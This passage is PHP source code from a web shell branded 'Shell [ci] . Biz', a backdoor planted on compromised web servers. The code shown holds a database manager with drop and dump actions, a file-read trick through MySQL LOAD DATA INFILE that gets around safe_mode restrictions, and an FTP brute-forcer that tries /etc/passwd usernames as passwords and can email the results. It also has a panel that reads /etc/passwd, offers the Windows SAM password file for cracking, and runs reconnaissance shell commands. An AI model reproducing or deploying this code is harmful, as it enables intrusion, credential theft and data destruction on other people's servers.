echo "<tr><td><b>".htmlspecialchars($name)."</b></td><td>".$field["Type"]."</td><td><select name=\"sql_tbl_insert_functs[".htmlspecialchars($name)."]\"><option value=\"\"></option><option>PASSWORD</option><option>MD5</option><option>ENCRYPT</option><option>ASCII</option><option>CHAR</option><option>RAND</option><option>LAST_INSERT_ID</option><option>COUNT</option><option>AVG</option><option>SUM</option><option value=\"\">--------</option><option>SOUNDEX</option><option>LCASE</option><option>UCASE</option><option>NOW</option><option>CURDATE</option><option>CURTIME</option><option>FROM_DAYS</option><option>FROM_UNIXTIME</option><option>PERIOD_ADD</option><option>PERIOD_DIFF</option><option>TO_DAYS</option><option>UNIX_TIMESTAMP</option><option>USER</option><option>WEEKDAY</option><option>CONCAT</option></select></td><td><input type=\"text\" name=\"sql_tbl_insert[".htmlspecialchars($name)."]\" value=\"".htmlspecialchars($values[$name])."\" size=50></td></tr>"; | |
$i++; | |
} | |
echo "</table><br>"; | |
echo "<input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"1\""; if (empty($sql_tbl_insert_q)) {echo " checked";} echo "><b>Insert as new row</b>"; | |
if (!empty($sql_tbl_insert_q)) {echo " or <input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"2\" checked><b>Save</b>"; echo "<input type=\"hidden\" name=\"sql_tbl_insert_q\" value=\"".htmlspecialchars($sql_tbl_insert_q)."\">";} | |
echo "<br><br><input type=\"submit\" value=\"Confirm\"></form>"; | |
} | |
} | |
if ($sql_tbl_act == "browse") | |
{ | |
$sql_tbl_ls = abs($sql_tbl_ls); | |
$sql_tbl_le = abs($sql_tbl_le); | |
echo "<hr size=\"1\" noshade>"; | |
echo "<img src=\"".$surl."act=img&img=multipage\" height=\"12\" width=\"10\" alt=\"Pages\"> "; | |
$b = 0; | |
for($i=0;$i<$numpages;$i++) | |
{ | |
if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_order=".htmlspecialchars($sql_order)."&sql_tbl_ls=".($i*$perpage)."&sql_tbl_le=".($i*$perpage+$perpage)."\"><u>";} | |
echo $i; | |
if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "</u></a>";} | |
if (($i/30 == round($i/30)) and ($i > 0)) {echo "<br>";} | |
else {echo " ";} | |
} | |
if ($i == 0) {echo "empty";} | |
echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"sql_order\" value=\"".htmlspecialchars($sql_order)."\"><b>From:</b> <input type=\"text\" name=\"sql_tbl_ls\" value=\"".$sql_tbl_ls."\"> <b>To:</b> <input type=\"text\" name=\"sql_tbl_le\" value=\"".$sql_tbl_le."\"> <input type=\"submit\" value=\"View\"></form>"; | |
echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgColor=#000000 borderColorLight=#c0c0c0 border=1>"; | |
echo "<tr>"; | |
echo "<td><input type=\"checkbox\" name=\"boxrow_all\" value=\"1\"></td>"; | |
for ($i=0;$i<mysql_num_fields($result);$i++) | |
{ | |
$v = mysql_field_name($result,$i); | |
if ($e[0] == "a") {$s = "d"; $m = "asc";} | |
else {$s = "a"; $m = "desc";} | |
echo "<td>"; | |
if (empty($e[0])) {$e[0] = "a";} | |
if ($e[1] != $v) {echo "<a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$e[0]."%20".$v."\"><b>".$v."</b></a>";} | |
else {echo "<b>".$v."</b><a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$s."%20".$v."\"><img src=\"".$surl."act=img&img=sort_".$m."\" height=\"9\" width=\"14\" alt=\"".$m."\"></a>";} | |
echo "</td>"; | |
} | |
echo "<td><font color=\"green\"><b>Action</b></font></td>"; | |
echo "</tr>"; | |
while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) | |
{ | |
echo "<tr>"; | |
$w = ""; | |
$i = 0; | |
foreach ($row as $k=>$v) {$name = mysql_field_name($result,$i); $w .= " `".$name."` = '".addslashes($v)."' AND"; $i++;} | |
if (count($row) > 0) {$w = substr($w,0,strlen($w)-3);} | |
echo "<td><input type=\"checkbox\" name=\"boxrow[]\" value=\"".$w."\"></td>"; | |
$i = 0; | |
foreach ($row as $k=>$v) | |
{ | |
$v = htmlspecialchars($v); | |
if ($v == "") {$v = "<font color=\"green\">NULL</font>";} | |
echo "<td>".$v."</td>"; | |
$i++; | |
} | |
echo "<td>"; | |
echo "<a href=\"".$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_query=".urlencode("DELETE FROM `".$sql_tbl."` WHERE".$w." LIMIT 1;")."\"><img src=\"".$surl."act=img&img=sql_button_drop\" alt=\"Delete\" height=\"13\" width=\"11\" border=\"0\"></a> "; | |
echo "<a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_insert_q=".urlencode($w)."\"><img src=\"".$surl."act=img&img=change\" alt=\"Edit\" height=\"14\" width=\"14\" border=\"0\"></a> "; | |
echo "</td>"; | |
echo "</tr>"; | |
} | |
mysql_free_result($result); | |
echo "</table><hr size=\"1\" noshade><p align=\"left\"><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\"><select name=\"sql_act\">"; | |
echo "<option value=\"\">With selected:</option>"; | |
echo "<option value=\"deleterow\">Delete</option>"; | |
echo "</select> <input type=\"submit\" value=\"Confirm\"></form></p>"; | |
} | |
} | |
else | |
{ | |
$result = mysql_query("SHOW TABLE STATUS", $sql_sock); | |
if (!$result) {echo mysql_smarterror();} | |
else | |
{ | |
echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#000000 borderColorLight=#c0c0c0 border=1><tr><td><input type=\"checkbox\" name=\"boxtbl_all\" value=\"1\"></td><td><center><b>Table</b></center></td><td><b>Rows</b></td><td><b>Type</b></td><td><b>Created</b></td><td><b>Modified</b></td><td><b>Size</b></td><td><b>Action</b></td></tr>"; | |
$i = 0; | |
$tsize = $trows = 0; | |
while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) | |
{ | |
$tsize += $row["Data_length"]; | |
$trows += $row["Rows"]; | |
$size = view_size($row["Data_length"]); | |
echo "<tr>"; | |
echo "<td><input type=\"checkbox\" name=\"boxtbl[]\" value=\"".$row["Name"]."\"></td>"; | |
echo "<td> <a href=\"".$sql_surl."sql_tbl=".urlencode($row["Name"])."\"><b>".$row["Name"]."</b></a> </td>"; | |
echo "<td>".$row["Rows"]."</td>"; | |
echo "<td>".$row["Type"]."</td>"; | |
echo "<td>".$row["Create_time"]."</td>"; | |
echo "<td>".$row["Update_time"]."</td>"; | |
echo "<td>".$size."</td>"; | |
echo "<td> <a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DELETE FROM `".$row["Name"]."`")."\"><img src=\"".$surl."act=img&img=sql_button_empty\" alt=\"Empty\" height=\"13\" width=\"11\" border=\"0\"></a> <a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DROP TABLE `".$row["Name"]."`")."\"><img src=\"".$surl."act=img&img=sql_button_drop\" alt=\"Drop\" height=\"13\" width=\"11\" border=\"0\"></a> <a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".$row["Name"]."\"><img src=\"".$surl."act=img&img=sql_button_insert\" alt=\"Insert\" height=\"13\" width=\"11\" border=\"0\"></a> </td>"; | |
echo "</tr>"; | |
$i++; | |
} | |
echo "<tr bgcolor=\"000000\">"; | |
echo "<td><center><b>»</b></center></td>"; | |
echo "<td><center><b>".$i." table(s)</b></center></td>"; | |
echo "<td><b>".$trows."</b></td>"; | |
echo "<td>".$row[1]."</td>"; | |
echo "<td>".$row[10]."</td>"; | |
echo "<td>".$row[11]."</td>"; | |
echo "<td><b>".view_size($tsize)."</b></td>"; | |
echo "<td></td>"; | |
echo "</tr>"; | |
echo "</table><hr size=\"1\" noshade><p align=\"right\"><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\"><select name=\"sql_act\">"; | |
echo "<option value=\"\">With selected:</option>"; | |
echo "<option value=\"tbldrop\">Drop</option>"; | |
echo "<option value=\"tblempty\">Empty</option>"; | |
echo "<option value=\"tbldump\">Dump</option>"; | |
echo "<option value=\"tblcheck\">Check table</option>"; | |
echo "<option value=\"tbloptimize\">Optimize table</option>"; | |
echo "<option value=\"tblrepair\">Repair table</option>"; | |
echo "<option value=\"tblanalyze\">Analyze table</option>"; | |
echo "</select> <input type=\"submit\" value=\"Confirm\"></form></p>"; | |
mysql_free_result($result); | |
} | |
} | |
} | |
} | |
} | |
else | |
{ | |
$acts = array("","newdb","serverstatus","servervars","processes","getfile"); | |
if (in_array($sql_act,$acts)) {?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new DB:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newdb"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newdb" size="20"> <input type="submit" value="Create"></form></td><td width="30%" height="1"><b>View File:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="getfile"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_getfile" size="30" value="<?php echo htmlspecialchars($sql_getfile); ?>"> <input type="submit" value="Get"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php } | |
if (!empty($sql_act)) | |
{ | |
echo "<hr size=\"1\" noshade>"; | |
if ($sql_act == "newdb") | |
{ | |
echo "<b>"; | |
if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";} | |
else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();} | |
} | |
if ($sql_act == "serverstatus") | |
{ | |
$result = mysql_query("SHOW STATUS", $sql_sock); | |
echo "<center><b>Server-status variables:</b><br><br>"; | |
echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#000000 borderColorLight=#000000 border=1><td><b>Name</b></td><td><b>Value</b></td></tr>"; | |
while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";} | |
echo "</table></center>"; | |
mysql_free_result($result); | |
} | |
if ($sql_act == "servervars") | |
{ | |
$result = mysql_query("SHOW VARIABLES", $sql_sock); | |
echo "<center><b>Server variables:</b><br><br>"; | |
echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#000000 borderColorLight=#000000 border=1><td><b>Name</b></td><td><b>Value</b></td></tr>"; | |
while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";} | |
echo "</table>"; | |
mysql_free_result($result); | |
} | |
if ($sql_act == "processes") | |
{ | |
if (!empty($kill)) {$query = "KILL ".$kill.";"; $result = mysql_query($query, $sql_sock); echo "<b>Killing process #".$kill."... ok. he is dead, amen.</b>";} | |
$result = mysql_query("SHOW PROCESSLIST", $sql_sock); | |
echo "<center><b>Processes:</b><br><br>"; | |
echo "<TABLE cellSpacing=0 cellPadding=2 bgColor=#000000 borderColorLight=#000000 border=1><td><b>ID</b></td><td><b>USER</b></td><td><b>HOST</b></td><td><b>DB</b></td><td><b>COMMAND</b></td><td><b>TIME</b></td><td><b>STATE</b></td><td><b>INFO</b></td><td><b>Action</b></td></tr>"; | |
while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td><td>".$row[2]."</td><td>".$row[3]."</td><td>".$row[4]."</td><td>".$row[5]."</td><td>".$row[6]."</td><td>".$row[7]."</td><td><a href=\"".$sql_surl."sql_act=processes&kill=".$row[0]."\"><u>Kill</u></a></td></tr>";} | |
echo "</table>"; | |
mysql_free_result($result); | |
} | |
if ($sql_act == "getfile") | |
{ | |
$tmpdb = $sql_login."_tmpdb"; | |
$select = mysql_select_db($tmpdb); | |
if (!$select) {mysql_create_db($tmpdb); $select = mysql_select_db($tmpdb); $created = !!$select;} | |
if ($select) | |
{ | |
$created = FALSE; | |
mysql_query("CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );"); | |
mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file"); | |
$result = mysql_query("SELECT * FROM tmp_file;"); | |
if (!$result) {echo "<b>Error in reading file (permision denied)!</b>";} | |
else | |
{ | |
for ($i=0;$i<mysql_num_fields($result);$i++) {$name = mysql_field_name($result,$i);} | |
$f = ""; | |
while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) {$f .= join ("\r\n",$row);} | |
if (empty($f)) {echo "<b>File \"".$sql_getfile."\" does not exists or empty!</b><br>";} | |
else {echo "<b>File \"".$sql_getfile."\":</b><br>".nl2br(htmlspecialchars($f))."<br>";} | |
mysql_free_result($result); | |
mysql_query("DROP TABLE tmp_file;"); | |
} | |
} | |
mysql_drop_db($tmpdb); //comment it if you want to leave database | |
} | |
} | |
} | |
} | |
echo "</td></tr></table>"; | |
if ($sql_sock) | |
{ | |
$affected = @mysql_affected_rows($sql_sock); | |
if ((!is_numeric($affected)) or ($affected < 0)){$affected = 0;} | |
echo "<tr><td><center><b>Affected rows: ".$affected."</center></td></tr>"; | |
} | |
echo "</table>"; | |
} | |
if ($act == "mkdir") | |
{ | |
if ($mkdir != $d) | |
{ | |
if (file_exists($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: object alredy exists";} | |
elseif (!mkdir($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: access denied";} | |
echo "<br><br>"; | |
} | |
$act = $dspact = "ls"; | |
} | |
if ($act == "ftpquickbrute") | |
{ | |
echo "<b>Ftp Quick brute:</b><br>"; | |
if (!win) {echo "This functions not work in Windows!<br><br>";} | |
else | |
{ | |
function k1r4ftpbrutecheck($host,$port,$timeout,$login,$pass,$sh,$fqb_onlywithsh) | |
{ | |
if ($fqb_onlywithsh) {$TRUE = (!in_array($sh,array("/bin/FALSE","/sbin/nologin")));} | |
else {$TRUE = TRUE;} | |
if ($TRUE) | |
{ | |
$sock = @ftp_connect($host,$port,$timeout); | |
if (@ftp_login($sock,$login,$pass)) | |
{ | |
echo "<a href=\"ftp://".$login.":".$pass."@".$host."\" target=\"_blank\"><b>Connected to ".$host." with login \"".$login."\" and password \"".$pass."\"</b></a>.<br>"; | |
ob_flush(); | |
return TRUE; | |
} | |
} | |
} | |
if (!empty($submit)) | |
{ | |
if (!is_numeric($fqb_lenght)) {$fqb_lenght = $nixpwdperpage;} | |
$fp = fopen("/etc/passwd","r"); | |
if (!$fp) {echo "Can't get /etc/passwd for password-list.";} | |
else | |
{ | |
if ($fqb_logging) | |
{ | |
if ($fqb_logfile) {$fqb_logfp = fopen($fqb_logfile,"w");} | |
else {$fqb_logfp = FALSE;} | |
$fqb_log = "FTP Quick Brute (called Shell [ci] . Biz ".$shver.") started at ".date("d.m.Y H:i:s")."\r\n\r\n"; | |
if ($fqb_logfile) {fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} | |
} | |
ob_flush(); | |
$i = $success = 0; | |
$ftpquick_st = getmicrotime(); | |
while(!feof($fp)) | |
{ | |
$str = explode(":",fgets($fp,2048)); | |
if (k1r4ftpbrutecheck("localhost",21,1,$str[0],$str[0],$str[6],$fqb_onlywithsh)) | |
{ | |
echo "<b>Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\"</b><br>"; | |
$fqb_log .= "Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\", at ".date("d.m.Y H:i:s")."\r\n"; | |
if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} | |
$success++; | |
ob_flush(); | |
} | |
if ($i > $fqb_lenght) {break;} | |
$i++; | |
} | |
if ($success == 0) {echo "No success. connections!"; $fqb_log .= "No success. connections!\r\n";} | |
$ftpquick_t = round(getmicrotime()-$ftpquick_st,4); | |
echo "<hr size=\"1\" noshade><b>Done!</b><br>Total time (secs.): ".$ftpquick_t."<br>Total connections: ".$i."<br>Success.: <font color=green><b>".$success."</b></font><br>Unsuccess.:".($i-$success)."</b><br>Connects per second: ".round($i/$ftpquick_t,2)."<br>"; | |
$fqb_log .= "\r\n------------------------------------------\r\nDone!\r\nTotal time (secs.): ".$ftpquick_t."\r\nTotal connections: ".$i."\r\nSuccess.: ".$success."\r\nUnsuccess.:".($i-$success)."\r\nConnects per second: ".round($i/$ftpquick_t,2)."\r\n"; | |
if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));} | |
if ($fqb_logemail) {@mail($fqb_logemail,"Shell [ci] . Biz ".$shver." report",$fqb_log);} | |
fclose($fqb_logfp); | |
} | |
} | |
else | |
{ | |
$logfile = $tmpdir_logs."k1r4_ftpquickbrute_".date("d.m.Y_H_i_s").".log"; | |
$logfile = str_replace("//",DIRECTORY_SEPARATOR,$logfile); | |
echo "<form action=\"".$surl."\"><input type=hidden name=act value=\"ftpquickbrute\"><br>Read first: <input type=text name=\"fqb_lenght\" value=\"".$nixpwdperpage."\"><br><br>Users only with shell? <input type=\"checkbox\" name=\"fqb_onlywithsh\" value=\"1\"><br><br>Logging? <input type=\"checkbox\" name=\"fqb_logging\" value=\"1\" checked><br>Logging to file? <input type=\"text\" name=\"fqb_logfile\" value=\"".$logfile."\" size=\"".(strlen($logfile)+2*(strlen($logfile)/10))."\"><br>Logging to e-mail? <input type=\"text\" name=\"fqb_logemail\" value=\"".$log_email."\" size=\"".(strlen($logemail)+2*(strlen($logemail)/10))."\"><br><br><input type=submit name=submit value=\"Brute\"></form>"; | |
} | |
} | |
} | |
if ($act == "d") | |
{ | |
if (!is_dir($d)) {echo "<center><b>Permision denied!</b></center>";} | |
else | |
{ | |
echo "<b>Directory information:</b><table border=0 cellspacing=1 cellpadding=2>"; | |
if (!$win) | |
{ | |
echo "<tr><td><b>Owner/Group</b></td><td> "; | |
$ow = posix_getpwuid(fileowner($d)); | |
$gr = posix_getgrgid(filegroup($d)); | |
$row[] = ($ow["name"]?$ow["name"]:fileowner($d))."/".($gr["name"]?$gr["name"]:filegroup($d)); | |
} | |
echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&d=".urlencode($d)."\"><b>".view_perms_color($d)."</b></a><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d))."</td></tr></table><br>"; | |
} | |
} | |
if ($act == "phpinfo") {@ob_clean(); phpinfo(); k1r4exit();} | |
if ($act == "security") | |
{ | |
echo "<center><b>Server security information:</b></center><b>Open base dir: ".$hopenbasedir."</b><br>"; | |
if (!$win) | |
{ | |
if ($nixpasswd) | |
{ | |
if ($nixpasswd == 1) {$nixpasswd = 0;} | |
echo "<b>*nix /etc/passwd:</b><br>"; | |
if (!is_numeric($nixpwd_s)) {$nixpwd_s = 0;} | |
if (!is_numeric($nixpwd_e)) {$nixpwd_e = $nixpwdperpage;} | |
echo "<form action=\"".$surl."\"><input type=hidden name=act value=\"security\"><input type=hidden name=\"nixpasswd\" value=\"1\"><b>From:</b> <input type=\"text=\" name=\"nixpwd_s\" value=\"".$nixpwd_s."\"> <b>To:</b> <input type=\"text\" name=\"nixpwd_e\" value=\"".$nixpwd_e."\"> <input type=submit value=\"View\"></form><br>"; | |
$i = $nixpwd_s; | |
while ($i < $nixpwd_e) | |
{ | |
$uid = posix_getpwuid($i); | |
if ($uid) | |
{ | |
$uid["dir"] = "<a href=\"".$surl."act=ls&d=".urlencode($uid["dir"])."\">".$uid["dir"]."</a>"; | |
echo join(":",$uid)."<br>"; | |
} | |
$i++; | |
} | |
} | |
else {echo "<br><a href=\"".$surl."act=security&nixpasswd=1&d=".$ud."\"><b><u>Get /etc/passwd</u></b></a><br>";} | |
} | |
else | |
{ | |
$v = $_SERVER["WINDIR"]."\repair\sam"; | |
if (file_get_contents($v)) {echo "<b><font color=red>You can't crack winnt passwords(".$v.") </font></b><br>";} | |
else {echo "<b><font color=green>You can crack winnt passwords. <a href=\"".$surl."act=f&f=sam&d=".$_SERVER["WINDIR"]."\\repair&ft=download\"><u><b>Download</b></u></a>, and use lcp.crack+ ©.</font></b><br>";} | |
} | |
if (file_get_contents("/etc/userdomains")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=userdomains&d=".urlencode("/etc")."&ft=txt\"><u><b>View cpanel user-domains logs</b></u></a></font></b><br>";} | |
if (file_get_contents("/var/cpanel/accounting.log")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=accounting.log&d=".urlencode("/var/cpanel/")."\"&ft=txt><u><b>View cpanel logs</b></u></a></font></b><br>";} | |
if (file_get_contents("/usr/local/apache/conf/httpd.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=httpd.conf&d=".urlencode("/usr/local/apache/conf")."&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";} | |
if (file_get_contents("/etc/httpd.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=httpd.conf&d=".urlencode("/etc")."&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";} | |
if (file_get_contents("/etc/syslog.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=syslog.conf&d=".urlencode("/etc")."&ft=txt\"><u><b>Syslog configuration (syslog.conf)</b></u></a></font></b><br>";} | |
if (file_get_contents("/etc/motd")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=motd&d=".urlencode("/etc")."&ft=txt\"><u><b>Message Of The Day</b></u></a></font></b><br>";} | |
if (file_get_contents("/etc/hosts")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=hosts&d=".urlencode("/etc")."&ft=txt\"><u><b>Hosts</b></u></a></font></b><br>";} | |
function displaysecinfo($name,$value) {if (!empty($value)) {if (!empty($name)) {$name = "<b>".$name." - </b>";} echo $name.nl2br($value)."<br>";}} | |
displaysecinfo("OS Version?",myshellexec("cat /proc/version")); | |
displaysecinfo("Kernel version?",myshellexec("sysctl -a | grep version")); | |
displaysecinfo("Distrib name",myshellexec("cat /etc/issue.net")); | |
displaysecinfo("Distrib name (2)",myshellexec("cat /etc/*-realise")); | |
displaysecinfo("CPU?",myshellexec("cat /proc/cpuinfo")); | |
displaysecinfo("RAM",myshellexec("free -m")); | |
displaysecinfo("HDD space",myshellexec("df -h")); | |
displaysecinfo("List of Attributes",myshellexec("lsattr -a")); | |
displaysecinfo("Mount options ",myshellexec("cat /etc/fstab")); | |
displaysecinfo("Is cURL installed?",myshellexec("which curl")); | |
displaysecinfo("Is lynx installed?",myshellexec("which lynx")); | |
displaysecinfo("Is links installed?",myshellexec("which links")); | |
displaysecinfo("Is fetch installed?",myshellexec("which fetch")); | |
displaysecinfo("Is GET installed?",myshellexec("which GET")); | |
displaysecinfo("Is perl installed?",myshellexec("which perl")); | |
displaysecinfo("Where is apache",myshellexec("whereis apache")); | |
displaysecinfo("Where is perl?",myshellexec("whereis perl")); | |
displaysecinfo("locate proftpd.conf",myshellexec("locate proftpd.conf")); | |
displaysecinfo("locate httpd.conf",myshellexec("locate httpd.conf")); | |
displaysecinfo("locate my.conf",myshellexec("locate my.conf")); | |
displaysecinfo("locate psybnc.conf",myshellexec("locate psybnc.conf")); | |
} | |
if ($act == "mkfile") | |
{ | |
if ($mkfile != $d) | |
{ | |
if (file_exists($mkfile)) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: object alredy exists";} | |
elseif (!fopen($mkfile,"w")) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: access denied";} | |
else {$act = "f"; $d = dirname($mkfile); if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} $f = basename($mkfile);} | |
} | |
else {$act = $dspact = "ls";} | |
} | |
if ($act == "encoder") | |
{ | |
echo "<script>function set_encoder_input(text) {document.forms.encoder.input.value = text;}</script><center><b>Encoder:</b></center><form name=\"encoder\" action=\"".$surl."\" method=POST><input type=hidden name=act value=encoder><b>Input:</b><center><textarea name=\"encoder_input\" id=\"input\" cols=50 rows=5>".@htmlspecialchars($encoder_input)."</textarea><br><br><input type=submit value=\"calculate\"><br><br></center><b>Hashes</b>:<br><center>"; | |
foreach(array("md5","crypt","sha1","crc32") as $v) | |
{ | |
echo $v." - <input type=text size=50 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$v($encoder_input)."\" readonly><br>"; | |
} | |
echo "</center><b>Url:</b><center><br>urlencode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".urlencode($encoder_input)."\" readonly> | |
<br>urldecode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".htmlspecialchars(urldecode($encoder_input))."\" readonly> | |
<br></center><b>Base64:</b><center>base64_encode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".base64_encode($encoder_input)."\" readonly></center>"; | |
echo "<center>base64_decode - "; | |
if (base64_encode(base64_decode($encoder_input)) != $encoder_input) {echo "<input type=text size=35 value=\"failed\" disabled readonly>";} | |
else | |
{ | |
$debase64 = base64_decode($encoder_input); | |
$debase64 = str_replace("\0","[0]",$debase64); | |
$a = explode("\r\n",$debase64); | |
$rows = count($a); | |
$debase64 = htmlspecialchars($debase64); | |
if ($rows == 1) {echo "<input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$debase64."\" id=\"debase64\" readonly>";} | |
else {$rows++; echo "<textarea cols=\"40\" rows=\"".$rows."\" onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" id=\"debase64\" readonly>".$debase64."</textarea>";} | |
echo " <a href=\"#\" onclick=\"set_encoder_input(document.forms.encoder.debase64.value)\"><b>^</b></a>"; | |
} | |
echo "</center><br><b>Base convertations</b>:<center>dec2hex - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\""; | |
$c = strlen($encoder_input); | |
for($i=0;$i<$c;$i++) | |
{ | |
$hex = dechex(ord($encoder_input[$i])); | |
if ($encoder_input[$i] == "&") {echo $encoder_input[$i];} | |
elseif ($encoder_input[$i] != "\\") {echo "%".$hex;} | |
} | |
echo "\" readonly><br></center></form>"; | |
} | |
if ($act == "fsbuff") | |
{ | |
$arr_copy = $sess_data["copy"]; | |
$arr_cut = $sess_data["cut"]; | |
$arr = array_merge($arr_copy,$arr_cut); | |
if (count($arr) == 0) {echo "<center><b>Buffer is empty!</b></center>";} | |
else {echo "<b>File-System buffer</b><br><br>"; $ls_arr = $arr; $disp_fullpath = TRUE; $act = "ls";} | |
} | |
if ($act == "selfremove") | |
{ | |
if (($submit == $rndcode) and ($submit != "")) | |
{ | |
if (unlink(__FILE__)) {@ob_clean(); echo "Thanks for using Shell [ci] . Biz".$shver."!"; k1r4exit(); } | |
else {echo "<center><b>Can't delete ".__FILE__."!</b></center>";} | |
} | |
else | |
{ | |
if (!empty($rndcode)) {echo "<b>Error: incorrect confimation!</b>";} | |
$rnd = rand(0,9).rand(0,9).rand(0,9); | |
echo "<form action=\"".$surl."\"><input type=hidden name=act value=selfremove><b>Self-remove: ".__FILE__." <br><b>Are you sure?<br>For confirmation, enter \"".$rnd."\"</b>: <input type=hidden name=rndcode value=\"".$rnd."\"><input type=text name=submit> <input type=submit value=\"YES\"></form>"; | |
} | |
} | |
